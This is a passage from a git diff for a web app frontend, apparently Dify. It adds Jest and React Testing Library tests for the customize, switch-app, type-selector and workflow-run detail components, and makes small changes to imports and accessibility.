expect(githubLink.querySelector('svg')).toBeInTheDocument() + }) + }) + }) + + // Props tests - verify props are correctly applied + describe('Props', () => { + it('should display correct appId in environment variables', async () => { + // Arrange + const customAppId = 'custom-app-id-456' + const props = { ...defaultProps, appId: customAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${customAppId}'`) + }) + }) + + it('should display correct api_base_url in environment variables', async () => { + // Arrange + const customApiUrl = 'https://custom-api.example.com' + const props = { ...defaultProps, api_base_url: customApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${customApiUrl}'`) + }) + }) + }) + + // Mode-based conditional rendering tests - verify GitHub link changes based on app mode + describe('Mode-based GitHub link', () => { + it('should link to webapp-conversation repo for CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-conversation repo for ADVANCED_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.ADVANCED_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-conversation') + }) + }) + + it('should link to webapp-text-generator repo for COMPLETION mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.COMPLETION } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for WORKFLOW mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.WORKFLOW } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + + it('should link to webapp-text-generator repo for AGENT_CHAT mode', async () => { + // Arrange + const props = { ...defaultProps, mode: AppModeEnum.AGENT_CHAT } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('href', 'https://github.com/langgenius/webapp-text-generator') + }) + }) + }) + + // External links tests - verify external links have correct security attributes + describe('External links', () => { + it('should have GitHub repo link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + expect(githubLink).toHaveAttribute('target', '_blank') + expect(githubLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + + it('should have Vercel docs link that opens in new tab', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + await waitFor(() => { + const vercelLink = screen.getByRole('link', { name: /step2Operation/i }) + expect(vercelLink).toHaveAttribute('href', 'https://vercel.com/docs/concepts/deployments/git/vercel-for-github') + expect(vercelLink).toHaveAttribute('target', '_blank') + expect(vercelLink).toHaveAttribute('rel', 'noopener noreferrer') + }) + }) + }) + + // User interactions tests - verify user actions trigger expected behaviors + describe('User Interactions', () => { + it('should call window.open with doc link when way 2 button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.way2.operation')).toBeInTheDocument() + }) + + const way2Button = screen.getByText('appOverview.overview.appInfo.customize.way2.operation').closest('button') + expect(way2Button).toBeInTheDocument() + fireEvent.click(way2Button!) + + // Assert + expect(mockWindowOpen).toHaveBeenCalledTimes(1) + expect(mockWindowOpen).toHaveBeenCalledWith( + expect.stringContaining('/guides/application-publishing/developing-with-apis'), + '_blank', + ) + }) + + it('should call onClose when modal close button is clicked', async () => { + // Arrange + const onClose = jest.fn() + const props = { ...defaultProps, onClose } + + // Act + render() + + // Wait for modal to be fully rendered + await waitFor(() => { + expect(screen.getByText('appOverview.overview.appInfo.customize.title')).toBeInTheDocument() + }) + + // Find the close button by navigating from the heading to the close icon + // The close icon is an SVG inside a sibling div of the title + const heading = screen.getByRole('heading', { name: /customize\.title/i }) + const closeIcon = heading.parentElement!.querySelector('svg') + + // Assert - closeIcon must exist for the test to be valid + expect(closeIcon).toBeInTheDocument() + fireEvent.click(closeIcon!) + expect(onClose).toHaveBeenCalledTimes(1) + }) + }) + + // Edge cases tests - verify component handles boundary conditions + describe('Edge Cases', () => { + it('should handle empty appId', async () => { + // Arrange + const props = { ...defaultProps, appId: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_APP_ID=\'\'') + }) + }) + + it('should handle empty api_base_url', async () => { + // Arrange + const props = { ...defaultProps, api_base_url: '' } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain('NEXT_PUBLIC_API_URL=\'\'') + }) + }) + + it('should handle special characters in appId', async () => { + // Arrange + const specialAppId = 'app-id-with-special-chars_123' + const props = { ...defaultProps, appId: specialAppId } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_APP_ID/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_APP_ID='${specialAppId}'`) + }) + }) + + it('should handle URL with special characters in api_base_url', async () => { + // Arrange + const specialApiUrl = 'https://api.example.com:8080/v1' + const props = { ...defaultProps, api_base_url: specialApiUrl } + + // Act + render() + + // Assert + await waitFor(() => { + const preElement = screen.getByText(/NEXT_PUBLIC_API_URL/i).closest('pre') + expect(preElement?.textContent).toContain(`NEXT_PUBLIC_API_URL='${specialApiUrl}'`) + }) + }) + }) + + // StepNum component tests - verify step number styling + describe('StepNum component', () => { + it('should render step numbers with correct styling class', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - The StepNum component is the direct container of the text + await waitFor(() => { + const stepNumber1 = screen.getByText('1') + expect(stepNumber1).toHaveClass('rounded-2xl') + }) + }) + }) + + // GithubIcon component tests - verify GitHub icon renders correctly + describe('GithubIcon component', () => { + it('should render GitHub icon SVG within GitHub link button', async () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Find GitHub link and verify it contains an SVG icon with expected class + await waitFor(() => { + const githubLink = screen.getByRole('link', { name: /step1Operation/i }) + const githubIcon = githubLink.querySelector('svg') + expect(githubIcon).toBeInTheDocument() + expect(githubIcon).toHaveClass('text-text-secondary') + }) + }) + }) +}) diff --git a/web/app/components/app/overview/customize/index.tsx b/web/app/components/app/overview/customize/index.tsx index e440a8cf26..698bc98efd 100644 --- a/web/app/components/app/overview/customize/index.tsx +++ b/web/app/components/app/overview/customize/index.tsx @@ -12,7 +12,6 @@ import Tag from '@/app/components/base/tag' type IShareLinkProps = { isShow: boolean onClose: () => void - linkUrl: string api_base_url: string appId: string mode: AppModeEnum diff --git a/web/app/components/app/overview/embedded/index.tsx b/web/app/components/app/overview/embedded/index.tsx index 6eba993e1d..d4be58b1b2 100644 --- a/web/app/components/app/overview/embedded/index.tsx +++ b/web/app/components/app/overview/embedded/index.tsx @@ -14,7 +14,7 @@ import type { SiteInfo } from '@/models/share' import { useThemeContext } from '@/app/components/base/chat/embedded-chatbot/theme/theme-context' import ActionButton from '@/app/components/base/action-button' import { basePath } from '@/utils/var' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { siteInfo?: SiteInfo diff --git a/web/app/components/app/overview/settings/index.tsx b/web/app/components/app/overview/settings/index.tsx index 3b71b8f75c..d079631cf7 100644 --- a/web/app/components/app/overview/settings/index.tsx +++ b/web/app/components/app/overview/settings/index.tsx @@ -25,7 +25,7 @@ import { useModalContext } from '@/context/modal-context' import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' import type { AppIconSelection } from '@/app/components/base/app-icon-picker' import AppIconPicker from '@/app/components/base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useDocLink } from '@/context/i18n' export type ISettingsModalProps = { diff --git a/web/app/components/app/switch-app-modal/index.spec.tsx b/web/app/components/app/switch-app-modal/index.spec.tsx new file mode 100644 index 0000000000..b6fe838666 --- /dev/null +++ b/web/app/components/app/switch-app-modal/index.spec.tsx @@ -0,0 +1,295 @@ +import React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import SwitchAppModal from './index' +import { ToastContext } from '@/app/components/base/toast' +import type { App } from '@/types/app' +import { AppModeEnum } from '@/types/app' +import { Plan } from '@/app/components/billing/type' +import { NEED_REFRESH_APP_LIST_KEY } from '@/config' + +const mockPush = jest.fn() +const mockReplace = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + }), +})) + +const mockSetAppDetail = jest.fn() +jest.mock('@/app/components/app/store', () => ({ + useStore: (selector: (state: any) => unknown) => selector({ setAppDetail: mockSetAppDetail }), +})) + +const mockSwitchApp = jest.fn() +const mockDeleteApp = jest.fn() +jest.mock('@/service/apps', () => ({ + switchApp: (...args: unknown[]) => mockSwitchApp(...args), + deleteApp: (...args: unknown[]) => mockDeleteApp(...args), +})) + +let mockIsEditor = true +jest.mock('@/context/app-context', () => ({ + useAppContext: () => ({ + isCurrentWorkspaceEditor: mockIsEditor, + userProfile: { + email: 'user@example.com', + }, + langGeniusVersionInfo: { + current_version: '1.0.0', + }, + }), +})) + +let mockEnableBilling = false +let mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, +} +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: mockPlan, + enableBilling: mockEnableBilling, + }), +})) + +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) =>
    AppsFull {loc}
    , +})) + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'app-123', + name: 'Demo App', + description: 'Demo description', + author_name: 'Demo author', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: AppModeEnum.COMPLETION, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +const renderComponent = (overrides: Partial> = {}) => { + const notify = jest.fn() + const onClose = jest.fn() + const onSuccess = jest.fn() + const appDetail = createMockApp() + + const utils = render( + + + , + ) + + return { + ...utils, + notify, + onClose, + onSuccess, + appDetail, + } +} + +describe('SwitchAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockIsEditor = true + mockEnableBilling = false + mockPlan = { + type: Plan.sandbox, + usage: { + buildApps: 0, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + total: { + buildApps: 10, + teamMembers: 0, + annotatedResponse: 0, + documentsUploadQuota: 0, + apiRateLimit: 0, + triggerEvents: 0, + vectorSpace: 0, + }, + } + }) + + // Rendering behavior for modal visibility and default values. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.switch')).toBeInTheDocument() + expect(screen.getByDisplayValue('Demo App(copy)')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.switch')).not.toBeInTheDocument() + }) + }) + + // Prop-driven UI states such as disabling actions. + describe('Props', () => { + it('should disable the start button when name is empty', async () => { + const user = userEvent.setup() + // Arrange + renderComponent() + + // Act + const nameInput = screen.getByDisplayValue('Demo App(copy)') + await user.clear(nameInput) + + // Assert + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + + it('should render the apps full warning when plan limits are reached', () => { + // Arrange + mockEnableBilling = true + mockPlan = { + ...mockPlan, + usage: { ...mockPlan.usage, buildApps: 10 }, + total: { ...mockPlan.total, buildApps: 10 }, + } + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.switchStart' })).toBeDisabled() + }) + }) + + // User interactions that trigger navigation and API calls. + describe('Interactions', () => { + it('should call onClose when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onClose } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'app.newApp.Cancel' })) + + // Assert + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should switch app and navigate with push when keeping original', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail, notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-001' }) + const setItemSpy = jest.spyOn(Storage.prototype, 'setItem') + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockSwitchApp).toHaveBeenCalledWith({ + appID: appDetail.id, + name: 'Demo App(copy)', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + }) + expect(onSuccess).toHaveBeenCalledTimes(1) + expect(onClose).toHaveBeenCalledTimes(1) + expect(notify).toHaveBeenCalledWith({ type: 'success', message: 'app.newApp.appCreated' }) + expect(setItemSpy).toHaveBeenCalledWith(NEED_REFRESH_APP_LIST_KEY, '1') + expect(mockPush).toHaveBeenCalledWith('/app/new-app-001/workflow') + expect(mockReplace).not.toHaveBeenCalled() + }) + + it('should delete the original app and use replace when remove original is confirmed', async () => { + const user = userEvent.setup() + // Arrange + const { appDetail } = renderComponent({ inAppDetail: true }) + mockSwitchApp.mockResolvedValueOnce({ new_app_id: 'new-app-002' }) + + // Act + await user.click(screen.getByText('app.removeOriginal')) + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(mockDeleteApp).toHaveBeenCalledWith(appDetail.id) + }) + expect(mockReplace).toHaveBeenCalledWith('/app/new-app-002/workflow') + expect(mockPush).not.toHaveBeenCalled() + expect(mockSetAppDetail).toHaveBeenCalledTimes(1) + }) + + it('should notify error when switch app fails', async () => { + const user = userEvent.setup() + // Arrange + const { notify, onClose, onSuccess } = renderComponent() + mockSwitchApp.mockRejectedValueOnce(new Error('fail')) + + // Act + await user.click(screen.getByRole('button', { name: 'app.switchStart' })) + + // Assert + await waitFor(() => { + expect(notify).toHaveBeenCalledWith({ type: 'error', message: 'app.newApp.appCreateFailed' }) + }) + expect(onClose).not.toHaveBeenCalled() + expect(onSuccess).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/switch-app-modal/index.tsx b/web/app/components/app/switch-app-modal/index.tsx index a7e1cea429..742212a44d 100644 --- a/web/app/components/app/switch-app-modal/index.tsx +++ b/web/app/components/app/switch-app-modal/index.tsx @@ -6,7 +6,7 @@ import { useContext } from 'use-context-selector' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/text-generate/item/index.tsx b/web/app/components/app/text-generate/item/index.tsx index 92d86351e0..d284ecd46e 100644 --- a/web/app/components/app/text-generate/item/index.tsx +++ b/web/app/components/app/text-generate/item/index.tsx @@ -30,7 +30,7 @@ import type { SiteInfo } from '@/models/share' import { useChatContext } from '@/app/components/base/chat/chat/context' import ActionButton, { ActionButtonState } from '@/app/components/base/action-button' import NewAudioButton from '@/app/components/base/new-audio-button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const MAX_DEPTH = 3 diff --git a/web/app/components/app/text-generate/saved-items/index.tsx b/web/app/components/app/text-generate/saved-items/index.tsx index c22a4ca6c2..e6cf264cf2 100644 --- a/web/app/components/app/text-generate/saved-items/index.tsx +++ b/web/app/components/app/text-generate/saved-items/index.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import copy from 'copy-to-clipboard' import NoData from './no-data' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { SavedMessage } from '@/models/debug' import { Markdown } from '@/app/components/base/markdown' import Toast from '@/app/components/base/toast' diff --git a/web/app/components/app/type-selector/index.spec.tsx b/web/app/components/app/type-selector/index.spec.tsx new file mode 100644 index 0000000000..346c9d5716 --- /dev/null +++ b/web/app/components/app/type-selector/index.spec.tsx @@ -0,0 +1,144 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import AppTypeSelector, { AppTypeIcon, AppTypeLabel } from './index' +import { AppModeEnum } from '@/types/app' + +jest.mock('react-i18next') + +describe('AppTypeSelector', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers default rendering and the closed dropdown state. + describe('Rendering', () => { + it('should render "all types" trigger when no types selected', () => { + render() + + expect(screen.getByText('app.typeSelector.all')).toBeInTheDocument() + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) + + // Covers prop-driven trigger variants (empty, single, multiple). + describe('Props', () => { + it('should render selected type label and clear button when a single type is selected', () => { + render() + + expect(screen.getByText('app.typeSelector.chatbot')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + + it('should render icon-only trigger when multiple types are selected', () => { + render() + + expect(screen.queryByText('app.typeSelector.all')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.chatbot')).not.toBeInTheDocument() + expect(screen.queryByText('app.typeSelector.workflow')).not.toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.clear' })).toBeInTheDocument() + }) + }) + + // Covers opening/closing the dropdown and selection updates. + describe('User interactions', () => { + it('should toggle option list when clicking the trigger', () => { + render() + + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.getByRole('tooltip')).toBeInTheDocument() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + + it('should call onChange with added type when selecting an unselected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.all')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.WORKFLOW]) + }) + + it('should call onChange with removed type when selecting an already-selected item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.workflow')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.workflow')) + + expect(onChange).toHaveBeenCalledWith([]) + }) + + it('should call onChange with appended type when selecting an additional item', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByText('app.typeSelector.chatbot')) + fireEvent.click(within(screen.getByRole('tooltip')).getByText('app.typeSelector.agent')) + + expect(onChange).toHaveBeenCalledWith([AppModeEnum.CHAT, AppModeEnum.AGENT_CHAT]) + }) + + it('should clear selection without opening the dropdown when clicking clear button', () => { + const onChange = jest.fn() + render() + + fireEvent.click(screen.getByRole('button', { name: 'common.operation.clear' })) + + expect(onChange).toHaveBeenCalledWith([]) + expect(screen.queryByRole('tooltip')).not.toBeInTheDocument() + }) + }) +}) + +describe('AppTypeLabel', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers label mapping for each supported app type. + it.each([ + [AppModeEnum.CHAT, 'app.typeSelector.chatbot'], + [AppModeEnum.AGENT_CHAT, 'app.typeSelector.agent'], + [AppModeEnum.COMPLETION, 'app.typeSelector.completion'], + [AppModeEnum.ADVANCED_CHAT, 'app.typeSelector.advanced'], + [AppModeEnum.WORKFLOW, 'app.typeSelector.workflow'], + ] as const)('should render label %s for type %s', (_type, expectedLabel) => { + render() + expect(screen.getByText(expectedLabel)).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. + it('should render empty label for unknown type', () => { + const { container } = render() + expect(container.textContent).toBe('') + }) +}) + +describe('AppTypeIcon', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Covers icon rendering for each supported app type. + it.each([ + [AppModeEnum.CHAT], + [AppModeEnum.AGENT_CHAT], + [AppModeEnum.COMPLETION], + [AppModeEnum.ADVANCED_CHAT], + [AppModeEnum.WORKFLOW], + ] as const)('should render icon for type %s', (type) => { + const { container } = render() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + // Covers fallback behavior for unexpected app mode values. + it('should render nothing for unknown type', () => { + const { container } = render() + expect(container.firstChild).toBeNull() + }) +}) diff --git a/web/app/components/app/type-selector/index.tsx b/web/app/components/app/type-selector/index.tsx index 0f6f050953..f213a89a94 100644 --- a/web/app/components/app/type-selector/index.tsx +++ b/web/app/components/app/type-selector/index.tsx @@ -2,7 +2,7 @@ import { useTranslation } from 'react-i18next' import React, { useState } from 'react' import { RiArrowDownSLine, RiCloseCircleFill, RiExchange2Fill, RiFilter3Line } from '@remixicon/react' import Checkbox from '../../base/checkbox' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { PortalToFollowElem, PortalToFollowElemContent, @@ -20,6 +20,7 @@ const allTypes: AppModeEnum[] = [AppModeEnum.WORKFLOW, AppModeEnum.ADVANCED_CHAT const AppTypeSelector = ({ value, onChange }: AppSelectorProps) => { const [open, setOpen] = useState(false) + const { t } = useTranslation() return ( { 'flex cursor-pointer items-center justify-between space-x-1 rounded-md px-2 hover:bg-state-base-hover', )}> - {value && value.length > 0 &&
    { - e.stopPropagation() - onChange([]) - }}> - -
    } + {value && value.length > 0 && ( + + )}
    diff --git a/web/app/components/app/workflow-log/detail.spec.tsx b/web/app/components/app/workflow-log/detail.spec.tsx new file mode 100644 index 0000000000..b594be5f04 --- /dev/null +++ b/web/app/components/app/workflow-log/detail.spec.tsx @@ -0,0 +1,319 @@ +/** + * DetailPanel Component Tests + * + * Tests the workflow run detail panel which displays: + * - Workflow run title + * - Replay button (when canReplay is true) + * - Close button + * - Run component with detail/tracing URLs + */ + +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DetailPanel from './detail' +import { useStore as useAppStore } from '@/app/components/app/store' +import type { App, AppIconType, AppModeEnum } from '@/types/app' + +// ============================================================================ +// Mocks +// ============================================================================ + +const mockRouterPush = jest.fn() +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockRouterPush, + }), +})) + +// Mock the Run component as it has complex dependencies +jest.mock('@/app/components/workflow/run', () => ({ + __esModule: true, + default: ({ runDetailUrl, tracingListUrl }: { runDetailUrl: string; tracingListUrl: string }) => ( +
    + {runDetailUrl} + {tracingListUrl} +
    + ), +})) + +// Mock WorkflowContextProvider +jest.mock('@/app/components/workflow/context', () => ({ + WorkflowContextProvider: ({ children }: { children: React.ReactNode }) => ( +
    {children}
    + ), +})) + +// Mock ahooks for useBoolean (used by TooltipPlus) +jest.mock('ahooks', () => ({ + useBoolean: (initial: boolean) => { + const setters = { + setTrue: jest.fn(), + setFalse: jest.fn(), + toggle: jest.fn(), + } + return [initial, setters] as const + }, +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockApp = (overrides: Partial = {}): App => ({ + id: 'test-app-id', + name: 'Test App', + description: 'Test app description', + author_name: 'Test Author', + icon_type: 'emoji' as AppIconType, + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + use_icon_as_answer_icon: false, + mode: 'workflow' as AppModeEnum, + enable_site: true, + enable_api: true, + api_rpm: 60, + api_rph: 3600, + is_demo: false, + model_config: {} as App['model_config'], + app_model_config: {} as App['app_model_config'], + created_at: Date.now(), + updated_at: Date.now(), + site: { + access_token: 'token', + app_base_url: 'https://example.com', + } as App['site'], + api_base_url: 'https://api.example.com', + tags: [], + access_mode: 'public_access' as App['access_mode'], + ...overrides, +}) + +// ============================================================================ +// Tests +// ============================================================================ + +describe('DetailPanel', () => { + const defaultOnClose = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + useAppStore.setState({ appDetail: createMockApp() }) + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render without crashing', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render workflow title', () => { + render() + + expect(screen.getByText('appLog.runDetail.workflowTitle')).toBeInTheDocument() + }) + + it('should render close button', () => { + const { container } = render() + + // Close button has RiCloseLine icon + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + }) + + it('should render Run component with correct URLs', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-456' }) }) + + render() + + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/app-456/workflow-runs/run-789/node-executions') + }) + + it('should render WorkflowContextProvider wrapper', () => { + render() + + expect(screen.getByTestId('workflow-context-provider')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED) + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should not render replay button when canReplay is false (default)', () => { + render() + + expect(screen.queryByRole('button', { name: 'appLog.runDetail.testWithParams' })).not.toBeInTheDocument() + }) + + it('should render replay button when canReplay is true', () => { + render() + + expect(screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' })).toBeInTheDocument() + }) + + it('should use empty URL when runID is empty', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions + // -------------------------------------------------------------------------- + describe('User Interactions', () => { + it('should call onClose when close button is clicked', async () => { + const user = userEvent.setup() + const onClose = jest.fn() + + const { container } = render() + + const closeButton = container.querySelector('span.cursor-pointer') + expect(closeButton).toBeInTheDocument() + + await user.click(closeButton!) + + expect(onClose).toHaveBeenCalledTimes(1) + }) + + it('should navigate to workflow page with replayRunId when replay button is clicked', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: createMockApp({ id: 'app-replay-test' }) }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).toHaveBeenCalledWith('/app/app-replay-test/workflow?replayRunId=run-to-replay') + }) + + it('should not navigate when replay clicked but appDetail is missing', async () => { + const user = userEvent.setup() + useAppStore.setState({ appDetail: undefined }) + + render() + + const replayButton = screen.getByRole('button', { name: 'appLog.runDetail.testWithParams' }) + await user.click(replayButton) + + expect(mockRouterPush).not.toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // URL Generation Tests + // -------------------------------------------------------------------------- + describe('URL Generation', () => { + it('should generate correct run detail URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run') + }) + + it('should generate correct tracing list URL', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'my-app' }) }) + + render() + + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('/apps/my-app/workflow-runs/my-run/node-executions') + }) + + it('should handle special characters in runID', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/app-id/workflow-runs/run-with-special-123') + }) + }) + + // -------------------------------------------------------------------------- + // Store Integration Tests + // -------------------------------------------------------------------------- + describe('Store Integration', () => { + it('should read appDetail from store', () => { + useAppStore.setState({ appDetail: createMockApp({ id: 'store-app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('/apps/store-app-id/workflow-runs/run-123') + }) + + it('should handle undefined appDetail from store gracefully', () => { + useAppStore.setState({ appDetail: undefined }) + + render() + + // Run component should still render but with undefined in URL + expect(screen.getByTestId('workflow-run')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED) + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty runID', () => { + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent('') + expect(screen.getByTestId('tracing-list-url')).toHaveTextContent('') + }) + + it('should handle very long runID', () => { + const longRunId = 'a'.repeat(100) + useAppStore.setState({ appDetail: createMockApp({ id: 'app-id' }) }) + + render() + + expect(screen.getByTestId('run-detail-url')).toHaveTextContent(`/apps/app-id/workflow-runs/${longRunId}`) + }) + + it('should render replay button with correct 